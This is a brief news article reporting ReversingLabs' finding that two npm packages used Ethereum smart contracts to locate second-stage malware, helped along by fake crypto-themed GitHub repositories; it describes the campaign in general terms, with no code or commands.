A new tactic in software supply chain attacks
Hackers are using Ethereum smart contracts to conceal malware within code libraries, according to a new report by cybersecurity firm ReversingLabs. The campaign, which targeted npm packages, represents a new type of software supply chain attack that exploits open-source ecosystems to spread malicious code.
How the malware works
Researchers discovered that two npm packages, “colortoolsv2” and its clone “mimelib2”, used smart contracts to fetch command-and-control (C2) instructions. Instead of embedding malicious links directly into the code, the packages executed an obfuscated script that queried an Ethereum contract to locate a second-stage downloader.
By hosting payload instructions on-chain, hackers made detection and takedown much harder, creating a new evasion technique not previously seen in open-source attacks.
Fake GitHub repos fuel the operation
The attackers also relied on crypto-themed GitHub repositories to boost credibility. These repositories featured inflated stars, automated commits, and fake maintainers to lure developers into adding the compromised packages as dependencies.
ReversingLabs noted that some repos posed as trading bots and crypto tools, such as “solana-trading-bot-v2,” giving the illusion of legitimacy with thousands of superficial commits and manipulated activity.
Campaign linked to wider open-source threats
While the malicious packages have been taken down after being reported to npm maintainers, researchers believe they were part of a much larger campaign spreading across both npm and GitHub. Previous campaigns flagged by ReversingLabs this year also abused developer trust by injecting malicious npm dependencies into widely used code libraries.
The bigger picture: evolving cyber threats
Lucija Valentic, a researcher at ReversingLabs, emphasized that this tactic shows how quickly cybercriminals are adapting to bypass detection. “These latest attacks demonstrate that efforts to implant malicious code in legitimate applications, steal data, and compromise digital assets are growing more sophisticated,” she said.
The report warns that open-source security risks are evolving, with blockchain technology now being used as part of advanced malware distribution strategies. Developers and organizations are urged to remain vigilant against attempts to infiltrate their projects with compromised dependencies.
